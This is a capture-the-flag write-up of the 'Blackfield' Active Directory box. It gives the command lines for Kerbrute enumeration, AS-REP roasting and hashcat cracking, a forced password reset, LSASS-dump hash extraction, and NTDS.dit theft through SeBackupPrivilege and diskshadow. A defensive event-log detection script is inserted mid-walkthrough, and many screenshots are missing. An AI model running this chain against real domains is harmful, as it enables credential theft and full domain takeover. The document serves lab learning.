Information Gathering

Rustscan

Based on the ports open, this looked like a classic Active Directory server.

┌──(yoon㉿kali)-[~/Documents/htb/blackfield]
└─$ rustscan --addresses 10.10.10.192 --range 1-65535
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛
<snip>
Open 10.10.10.192:53
Open 10.10.10.192:88
Open 10.10.10.192:135
Open 10.10.10.192:389
Open 10.10.10.192:445
Open 10.10.10.192:593
Open 10.10.10.192:3268
Open 10.10.10.192:5985
Open 10.10.10.192:64771

Nmap

Nmap discovered the domain name, which I added to /etc/hosts.

┌──(yoon㉿kali)-[~/Documents/htb/blackfield]
└─$ sudo nmap -sVC -p 53,88,135,389,445,593,3268,5985 10.10.10.192   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-31 21:14 EDT
Nmap scan report for DC01 (10.10.10.192)
Host is up (0.37s latency).
 
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-04-01 08:11:14Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
| smb2-time: 
|   date: 2024-04-01T08:11:40
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h56m40s
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.04 seconds

Enumeration

SMB - TCP 445

Crackmapexec discovered the domain name, which I had already added to /etc/hosts:

10.10.10.192 DC01 DC01.BLACKFIELD.local BLACKFIELD.local BLACKFIELD

Luckily, SMB null login was allowed:

smbclient -N -L 10.10.10.192

The null user had access to profiles$, but access to all the other shares was denied.

On the profiles$ share, there were a bunch of usernames:

I saved them to profile.txt.

Using awk, I made a list of the account names in username.txt.

With username.txt created, I decided to enumerate the other services before moving on to AS-REP Roasting or Kerbruting.

LDAP - TCP 389

Ldapsearch confirmed the base namingcontexts:

ldapsearch -H ldap://10.10.10.192 -x -s base namingcontexts

I tried a null bind to the base DN, but it was not allowed:

ldapsearch -H ldap://10.10.10.192 -x -b "DC=BLACKFIELD,DC=local"

RPC - TCP 135

RPC also required credentials for querying:

Access as support

Kerbrute

Since I had spent enough time on enumeration and nothing had shown up other than potential usernames, I moved on to Kerbruting.

Using Kerbrute, I could filter out the valid usernames by querying the KDC:

./kerbrute_linux_amd64 userenum -d BLACKFIELD.LOCAL --dc DC01.BLACKFIELD.LOCAL ~/Documents/htb/blackfield/username.txt

Kerbrute found three users: audit2020, support, and svc_backup.

More interestingly, user support seemed to be vulnerable to AS-REP Roasting (the KDC answered for it without requiring pre-authentication).

AS-REP Roasting

Using GetNPUsers.py, I could obtain a hashcat-crackable AS-REP hash for user support:

GetNPUsers.py -no-pass -dc-ip 10.10.10.192 BLACKFIELD.LOCAL/support

Hash Cracking

Using hashcat, I cracked the password and obtained the credentials support:#00^BlackKnight:

hashcat -m 18200 hash.asreproast rockyou.txt

Kerberoasting - Failed

I tried Kerberoasting with the found credentials, but no SPN hashes came back:

GetUserSPNs.py BLACKFIELD.LOCAL/support:'#00^BlackKnight' -dc-ip DC01.BLACKFIELD.LOCAL -request

SMB - SYSVOL & NETLOGON

I hoped user support had access to WinRM, but unfortunately it didn't:

However, it had access to SMB:

I was able to access the SYSVOL share as support; it had a BLACKFIELD.local directory inside:

I recursively downloaded everything:

All the files were in the Policies folder, but none of them contained the keyword "password":

The NETLOGON share was empty:

Access as audit2020

Bloodhound

Since all the enumeration done as user support returned nothing useful, I moved on to BloodHound to enumerate Active Directory.

I first ran bloodhound-python to obtain the JSON files with the domain information:

sudo python bloodhound.py -u support -p '#00^BlackKnight' -c ALL -ns 10.10.10.192 -d BLACKFIELD.LOCAL

I started the neo4j console and BloodHound using the commands below:

sudo neo4j console
bloodhound

I dragged and dropped the JSON files into BloodHound and first marked user support as owned:

Checking Outbound Object Control, there was one First Degree Object Control entry for user support:

User SUPPORT@BLACKFIELD.LOCAL had the capability to change the user AUDIT2020@BLACKFIELD.LOCAL’s password without knowing that user’s current password.

ForceChangePassword for audit2020

BloodHound provided a guide on how to abuse this misconfiguration, but following it somehow didn't work for me:

Instead, I signed in over RPC as support and changed the password for audit2020:

setuserinfo2 audit2020 23 Password123!

Shell as svc_backup

SMB - Forensic

I tried Evil-WinRM as audit2020 with the changed password, but it didn't work. It seemed that audit2020 wasn't in the WinRM group.

However, audit2020 did have access to the forensic share:

smbclient //10.10.10.192/forensic -U audit2020%'Password123!'

Again, I recursively downloaded everything:

In the memory_analysis folder, there was one zip file that looked interesting: lsass.zip.

I unzipped the file to obtain the lsass.DMP file:

sudo unzip lsass.zip

Using pypykatz, I was able to extract password hashes from the LSASS minidump:

pypykatz lsa minidump lsass.DMP

I had the NT hashes for both svc_backup and Administrator:

Unfortunately, for some reason, passing the hash for Administrator didn't work:

However, passing the hash for svc_backup gave me a shell:

Privesc: svc_backup to Administrator

SeBackupPrivilege

Listing the privileges svc_backup had with whoami /priv, I saw SeBackupPrivilege, which is a really strong privilege.

SeBackupPrivilege basically allows full read access to the file system regardless of ACLs, and svc_backup had this privilege because it was a member of the Backup Operators group:

By abusing this privilege, I could dump password hashes by downloading the SAM, SYSTEM, and NTDS.dit files to my local machine.

File Name | Description                                                                              | Location
SAM       | Security Account Manager database storing user account information and password hashes  | %SystemRoot%\system32\config directory on Windows
SYSTEM    | Windows registry file containing encryption keys and security-related data               | %SystemRoot%\system32\config directory on Windows
NTDS.dit  | Active Directory database storing directory objects, including user account hashes      | %SystemRoot%\NTDS directory on domain controllers
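The detection counterpart to the three techniques chained in this write-up (AS-REP roasting of support, ForceChangePassword against audit2020, and the SeBackupPrivilege logon as svc_backup), as an added example that is not part of the original post. The events and the two allow-lists are constructed; field names follow the JSON export of Windows Security events 4768, 4724 and 4672.

```python
"""Triage constructed Windows Security events for the techniques used on this box.

4768 - Kerberos TGT requested: PreAuthType "0" together with RC4 (0x17) means the
       account answered without pre-authentication, the signature of AS-REP roasting.
4724 - password reset attempt on another account: a reset by a non-admin actor is
       what ForceChangePassword abuse looks like on the DC.
4672 - special privileges assigned to a new logon: SeBackupPrivilege granted to an
       account outside the expected set (Backup Operators members show up here).
"""

# Constructed sample events (not real telemetry). Field names mirror the JSON export.
EVENTS = [
    {"EventID": 4768, "TargetUserName": "support", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "192.0.2.10"},
    {"EventID": 4768, "TargetUserName": "audit2020", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "192.0.2.20"},
    {"EventID": 4724, "SubjectUserName": "support", "TargetUserName": "audit2020"},
    {"EventID": 4672, "SubjectUserName": "svc_backup",
     "PrivilegeList": "SeBackupPrivilege\n\t\t\tSeRestorePrivilege"},
    {"EventID": 4672, "SubjectUserName": "Administrator",
     "PrivilegeList": "SeBackupPrivilege\n\t\t\tSeDebugPrivilege"},
]

# Assumed allow-lists for this environment; tune them to the real admin model.
PASSWORD_ADMINS = {"administrator"}   # accounts allowed to reset other users' passwords
BACKUP_ADMINS = {"administrator"}     # accounts expected to log on with SeBackupPrivilege


def triage(events):
    """Return (rule, actor_or_target, detail) tuples for every suspicious event."""
    findings = []
    for e in events:
        eid = e.get("EventID")
        if eid == 4768:
            # Pre-auth skipped and RC4 requested: the hash in the AS-REP is crackable offline.
            if e.get("PreAuthType") == "0" and e.get("TicketEncryptionType", "").lower() == "0x17":
                findings.append(("asrep_roast", e["TargetUserName"], e["IpAddress"]))
        elif eid == 4724:
            actor, target = e["SubjectUserName"].lower(), e["TargetUserName"].lower()
            # Self-service resets are 4723; a 4724 from a non-admin on someone else is the ACL abuse.
            if actor != target and actor not in PASSWORD_ADMINS:
                findings.append(("forced_password_reset", e["SubjectUserName"], e["TargetUserName"]))
        elif eid == 4672:
            privs = {p.strip() for p in e["PrivilegeList"].split()}
            if "SeBackupPrivilege" in privs and e["SubjectUserName"].lower() not in BACKUP_ADMINS:
                findings.append(("backup_privilege_logon", e["SubjectUserName"], ",".join(sorted(privs))))
    return findings


if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```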

Execution

I used the reg command to save the SAM and SYSTEM registry hives to the Temp directory:

After downloading SAM and SYSTEM to my local machine, I could use pypykatz to extract the password hashes.

pypykatz is a Python implementation of mimikatz; its registry module parses the SAM and SYSTEM hives offline, so I could use it to get the password hashes:

pypykatz registry --sam sam system

Unfortunately, passing the above hash to crackmapexec didn't work out (on a domain controller the local SAM only holds the DSRM account; the domain accounts live in NTDS.dit).

Extracting NTDS.dit

I followed this tutorial by Hacking Articles.

The idea is to create a Distributed Shell File (dsh file) that contains all the commands Diskshadow needs to create a full copy of the Windows drive, from which I can then extract the ntds.dit file. I moved to the Kali Linux shell and created a dsh file. In this file, I instructed Diskshadow to expose a shadow copy of the C: drive as the Z: drive, with "jadu" as its alias. After creating this dsh file, I used unix2dos to convert the line endings of the dsh file to ones compatible with the Windows machine.

  1. Created the dsh file to copy the C: drive:

  2. Uploaded the dsh file and ran it to copy the disk:

  3. Copied the C: drive into the Z: drive:

Now, using the commands below, I downloaded ntds.dit and the relevant SYSTEM hive to my local machine:

reg save hklm\system c:\Temp\system
cd C:\Temp
download ntds.dit
download system

Using secretsdump.py, I dumped all the password hashes:

Now I have a shell as Administrator:

Reference